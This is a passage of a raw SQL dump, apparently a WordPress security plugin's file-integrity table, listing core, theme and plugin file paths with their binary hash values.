','',0,'?'),('�]K{�ٯ��`�{�,','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+E�YH��<YPK=�S','ۋ�&�:^���G���&B���2�PC��~���','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�x;_�q��*`<','wp-includes/blocks/group/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=>���*��f��[���','ϩ���z��J&�O{|K�^�֤�0.�1t','',0,'?'),('�|��t���\r����','wp-content/plugins/redirection/locale/redirection-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' h}[�� �k,O�,','� �h���ώ��L��?\Z���� �RIҬ{','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('����^[X��i�	�','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���N�+l�����1','�j��S<�%\\�C��cK2�\\0��\Z�_��R','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��H�� lO J\rN','�m���%�n\r��؛��qi���m���V&W','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˭�f|�o�^PD�k','X+�aX�\Z4�UL��v5[�Y3r�O{�����','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�W��p�]\'zAz�','�q���*�lmKңk�\"�M�Q?�p���a؂�4','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��d*W�����1g�','�+q�~;f�E_�#�]I�V�\\�k?l���ÝϞ�','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���p�1J�IZH�x�','wp-content/plugins/wordfence/js/wfi18n.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU	��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('�	���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l­}�莐�','y��T��Nz+����⃆��\'��%Y�','',0,'?'),('�����L��\Z��','wp-includes/blocks/query-pagination/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��c�i�?\\��$3','5K��ߒAͼ~��;#x�(ĬE�-�-�}���','',0,'?'),('�o͑��4\\RX���r','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8����I�y{��8�','�O��t-�qu�b���O���%�\r?�3�80��','',0,'?'),('��{�]\\ֵ�	��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bG�2���4�j��j�7','�3�~�\'����$�����W�E��\\��Y�','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�%��+~���R1��҉','wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�E��ZȖZR�K<�','wp-content/themes/newsmagbd/inc/customizer/core/sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I\'Wկte_3�n','���>Ȫ�Q-�\n���PGvgf�1J�O���','',0,'?'),('�v%���S�[�̪�Ѿ','wp-includes/ms-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\n����[�|�J/�','�8f�٣�“��<}.Q��������','',0,'?'),('���rsa���9SUU��','wp-includes/blocks/post-featured-image/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���ź��u���)','��l�N�}�T��a��	q���)����LB�','',0,'?'),('��~C�>��xh��\r','wp-content/plugins/wp-cerber/assets/flags/bh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tx\n=CS\Z�f��PF|','(���=AEhe�SJ駄�_�Ve2Z�E��&j�','',0,'?'),('������v�yL��e��!','wp-includes/blocks/post-terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ЧO�<�㏑?O','R<ˣhG�f`9�U��=£����_�3H԰�K�','',0,'?'),('���|X%jgu@�CJ�M','wp-includes/js/dist/vendor/react.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('��\'^�����,�h�','wp-content/plugins/redirection/models/url/url-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��̕���!:fLu$��','g�E n�L��D�%�\"U0\09\0Omn�<˟�NP�','',0,'?'),('�ւxRa��ǜ�@','wp-includes/css/dist/editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�LS�>X(ن{��','sn�Ǹ&�ܽ��T(���p��i��Α����','',0,'?'),('���X\"�-{��$48sx','wp-admin/css/deprecated-media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+�H�h����3','�ؖ)_��6h����1��A\\�_lgK�d�kUX�q','',0,'?'),('���\r��Z���O[΅f�','wp-includes/blocks/columns/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1tCt�/�[�_źw\nk�','ˑ��3�qg��n]�_�@��v�����7�!�','',0,'?'),('��42���i�[�O��','wp-content/plugins/wp-cerber/assets/flags/tf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�``�O��.�˛�','��������r��4�&,lb�Fr~�T<���阈�','',0,'?'),('��Ud��M���S$�l','wp-admin/includes/class-wp-list-table-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�>\r_D\"��Ck��C','\\�;��]\"���(+/��}�˚q5��NS\'�','',0,'?'),('�\0���O��b5o�','wp-content/plugins/wp-cerber/assets/flags/ir.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dV�M�t^,��7�xD','i��֚b5�J��?]����+��H�r8��','',0,'?'),('�\rz��@�_Ð�m�dM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�96�f����;���0','mgc%�i\Zn�A��B�@��wF�z�;�y`\rN','',0,'?'),('�@G��t�eY�\\\'>�O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iC���^Ao*�','��\'iU�\'FL��[�	5��\'*���a8MgG�>','',0,'?'),('�Z��Wt�p�N�h','wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&hl6���H�','֢!���B��B0�)��e�4�_߱�7\r','',0,'?'),('����Ȯr��&x�q�','wp-content/plugins/wp-cerber/assets/flags/fi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ќ0C��e���#��','�r\r=O�֓bt����:ٚU$R?�}�t��','',0,'?'),('��#;��e��O\"��#[','wp-includes/blocks/shortcode/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����X�cy	F�JGs','� �L���(��5g\0��[[{d��Nm�j���','',0,'?'),('��Z ��Og\nW�W�2','wp-includes/js/wp-embed-template.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('����B�J�<�`��','wp-includes/blocks/post-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӏ(�R�u}d�Ӏ���','`���H9\Z��͉��˻WʒSw$�F��u2L=','',0,'?'),('��!�h>�iq�8t��n','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('���\\��9�ѕ�F�w�','wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��Oez���nUR','�q��:\\��H�-��ƒ�V��i���ԍ�$','',0,'?'),('�����Ly��RB�9�k','wp-content/plugins/wp-cerber/assets/flags/mh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0oէ��3ˠ','�ܰ�\n\0�\'6G�R���ZH-�`��Ș��	','',0,'?'),('���-o����mq�\0X','wp-includes/class-wp-block-editor-context.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���i�������3','��]�c��׭�с��&j̈́��\0j�߹��','',0,'?'),('��M3�vaBcd�','wp-includes/blocks/search/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���� �N+~/�7z','�,�G*����?a�~�q�<�2E9�fa���=','',0,'?'),('�:��+��hy^W�','wp-includes/block-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*p��b�՚JҖi��','�\"��\0���q�,�=�LxA\";1��j+q�����','',0,'?'),('�/=�+HhE��14�ʆ�','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Pɖ���3Tر#��','>㈳ec�¯f4s�7�8���#G�`�x��0��','',0,'?'),('�1:��9,׮n\"�','wp-includes/class-wp-theme-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����_Ü]G��J','p౽��+��l�����?܅��\Z�.�','',0,'?'),('�@)` ��~O�}�ac�','wp-includes/blocks/heading/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+)�/��\n�_,,п','~��.�bֹ��Nk��D�ډ%3�ޠ�g���','',0,'?'),('�GR�������m)','wp-content/plugins/wp-cerber/assets/flags/kg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8]�/E0%�gQյQ�','�3$��f�Rx)��@\\�e.3\Z�Ω�\r`p�Y','',0,'?'),('����N���@�(�3�','wp-includes/ID3/module.audio.mp3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O:B঍\0�z�6x`B','�	]����	\0On��6B;���\ZZ$�	2ЯSh','',0,'?'),('��h���)UG@�x��v	','wp-admin/edit-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`A�U�Ҽ�ݚ�n��','\"�k�NO��p7�K��(����\"�O�kB','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�d<���\\ڊ�ݱ','ܧc%P<��5ä�(�Fz�}k?�4�:��{ ','',0,'?'),('��or�������籽�','wp-content/plugins/wp-cerber/assets/flags/bq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3y-L���<��/','\0�g��NiLQ\\�Q�N���g!0�MJ|Lg�*��','',0,'?'),('�\r[�8�)�r�}8e','wp-content/plugins/wp-cerber/assets/flags/sz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{W���:��(�Բ�','PJU����I\"�,�����uVo��ƞ�dQ*z','',0,'?'),('�	Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=\'�<�+�,�','��F��1��3\'��l�R��ۢ������VK','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&���9iї�R7�','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�Z��S=�\0����v�H','wp-content/plugins/wp-cerber/assets/flags/er.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ք#ӕ��?.O�]��','��\0�D?J1�nd�&�%��6\"ᅃ�.��� ','',0,'?'),('�v�FI��2h���n�','wp-content/plugins/wordfence/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=����im5�{�iX�.','x���w+�g]�O�;s$\n	\\��	9����k�','',0,'?'),('�{�1�\"��^���.','wp-includes/class-wp-widget-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','efp|r��)\ne��\\','�r�&����m�pK��	(�E8��:N%z��','',0,'?'),('�}����\'GT�O��','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aӽ�D[\0 �M�W��','j�L�8ń��pOw�f?�iaWȎ�\"��d�','',0,'?'),('���s��������v ','wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�j�G$�?n��/�Y','�.��<r�Ej&�0���DV�F5O�瀞 ���','',0,'?'),('��s��I�qF�����','wp-admin/includes/class-theme-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�lJc\0�2����1T','�,0v�og��\0�L���9����@j\n���NkI�','',0,'?'),('���=V;�����N.K','wp-includes/js/wp-list-revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�����h��١k�','wp-content/plugins/wp-cerber/assets/fb2b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}d��ΰ��R͵�','Ky�Y	�O~�vx�W�� �<3����PZPZ','',0,'?'),('����7OPs�Ωp��W','wp-content/plugins/wp-cerber/assets/multi/multi.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P?�� a��80�$','*}�AB�/�*o%���;���5��k��;�3','',0,'?'),('��\n�ӛIQED	��','wp-includes/class-wp-comment-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('����\\�M�M�F/�I','wp-includes/Requests/Auth/Basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I}\n�Ѵ��M��\"_V','���8��h��s�+d�ƃ����*&�9ɯ�','',0,'?'),('��Κ,�Q�a�gl��\Z�','wp-includes/class-smtp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ����	+\'8k_','',0,'?'),('��s��,��j�j3','wp-content/plugins/wp-cerber/assets/flags/gg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��L\Z��|�=�c��','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0�����ou��̌�','����7/Q���ƐՐw�g:�?��#{s��ɟ�','',0,'?'),('��dA#���*�Źo7','wp-admin/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�D�Ï�(�dg����','>�L�����/�G��4�N@5;�gq�ߧ�','',0,'?'),('�3=^��7�P�RA','wp-content/plugins/wp-cerber/assets/flags/sr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NT��I`$�x�\"v','�J!�^�α}���ݓ$�R�M~i���c���P','',0,'?'),('��V\ZF��\0���|�','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('���x�OW\r�����','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�5ڜ���2�l2{�','wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�ܥ��d|Q�S�n�','��R;T��wh��m^�����䜺��K�L�A','',0,'?'),('�D��!VD+����','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�V���	�9�J�','փ��hbf��#��Ђ��OE��R���9H\r','',0,'?'),('�M�/<�P�ߍ�f.��','wp-includes/js/jquery/ui/effect-bounce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('�Q�\\�>:3���7','wp-content/plugins/wp-cerber/languages/wp-cerber-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n$��F��\0J��:e','f�5�0N ���\0�\Z�w���5+�#_���\'�2õ','',0,'?'),('�VT��2e�w�gߋu8','wp-includes/js/jquery/ui/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('�V�r�2Fk\0�<��h�','wp-content/plugins/wp-cerber/languages/wp-cerber-bs_BA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rD���.֡h�-�','`�A�\"��f�*�B2$e �Vr�̜��3��','',0,'?'),('�z�6��+���PH\r�tU','wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A<7p��\Z@!ToP�Df`','k�he��:�(8p�w�r]pU*�g�;\r��tH�','',0,'?'),('���˥̰MVЗe�A�','wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3S��-!@|��[�M','���s�n�����U������Bo3�}��+�+','',0,'?'),('���t��(�iltY/','wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q9˵��z�(�O��䞴','����x&C�no\nD���/��ǦT�EI�!Q','',0,'?'),('��Τe;y�[��9�9','wp-includes/js/jquery/ui/checkboxradio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('��\nL0Qod`�\\�;�','wp-content/plugins/wp-cerber/assets/icons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T4�s�bRߺ0�','v	�QNԯ�L�|̗E��,@���8By�:Y��','',0,'?'),('��3\"�(z�a�4�8�','wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('����m��{�@�m�','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oLFʒ4��i�--','���Cc#1_��|��Z  ��1��ɾ���Yx�','',0,'?'),('��`���\'��,�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M1m/�VY��W.2 {','�*��ԃ\'�&�@X$�\0h%%��X�i�);�^','',0,'?'),('�\n�\"Y|�v���oE��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2I�li��g���R�w','D�V����]�\\�P���f�y�K�u�a�m��','',0,'?'),('�~Q�ԁŴFp���','wp-includes/class-wp-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�@���뵰On�','wp-includes/blocks/html/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�3*����$','�c>�N�_�8���]�������A\Z�6�','',0,'?'),('�2|�MJ�/�͆�^�}','wp-content/plugins/wp-cerber/assets/flags/ao.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\'��cu��fq�','�9&��[��؊�|�&���ʘ�����<��HR','',0,'?'),('�kHm�1��`0ѹ��_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����sg�5�䃥l','�?*��\0Z:WX̩�k�k\0IM��UT','',0,'?'),('�zݿ�&X❙6���s','wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�8ʄqG���<!��N','1�R\"���\'er���Ӏ[�� P+�T,f!','',0,'?'),('��!��y��F��]���','wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&L�g=�%cn�	}ǣ�','(��`���ĺ�E�ϙ)#��I�jHߠ�&�{','',0,'?'),('����\n ����(z','wp-includes/PHPMailer/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('�����z(�d�\'dIt�\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��4?ŽN��Pɴ�_�','ȏ�DEDL]R���d��4�\"�$ A�vǓ�','',0,'?'),('�ٵ\nh��Jx�dv�ԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\-�op�`Os}B�','/�];�%X_�kz#O�a�;���H�ߟ�','',0,'?'),('�$��Ld�N�B��1','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0;�A�\\\\E�gC�^\\','�P��ˡr�#��bhI.�;��ٵ7�\'콀N','',0,'?'),('��$�T�X�@#��A��','wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H����֬�����','hw����,�Dz�&�t��=#]$3���b��','',0,'?'),('���2zs�4x�EB','wp-includes/ID3/module.tag.id3v1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IU��.Q�c�g���','�C��BH�9��D�y�;-�K�:LAx�?8\\~�	��','',0,'?'),('�_r#�Eȯ�̪%','wp-content/plugins/wp-cerber/assets/flags/ne.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�`R��$�`}L��\0\"�','h�~w=+^��Q#Wt/��	w�~�j���+','',0,'?'),('�Obc��\" ���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('����e��7�F�%','wp-includes/blocks/post-title/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7���	���+�=��','\Z_��E(��z�mc����a��œ1&-�4)','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�L�^�^��JW�z\Z','�o[.7~Cm*��-�l��=�BP��5-IL�','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�—\nXj�\'�;q�{��a�','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˷^M\'�NlT�t��{�.','fxs0*o���u1m�8�h������=A��a','',0,'?'),('�PB���&G�h���','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����w\n�Mus���','O���=~jc#�6��L窜����as�W�OQ-','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�ok#�/��ːe','�����l�G&�������<��U��[[�m','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�e����ps�J�','�L?�<�#p�_��4i4�É�5�V����\'','',0,'?'),('Š�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ew��+�v�%&hf�6\Zr','�9�@�SRԺb5�q���&r{׬��zt�','',0,'?'),('�����ġ!����\Z','wp-includes/blocks/categories/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V>�m\0Or<�4��k','��:\0����\r���o	G�B\0c��| l;�','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�\"�\r\r�','x��=��|ˋ{�lbn��;��Ep���r�?','',0,'?'),('�	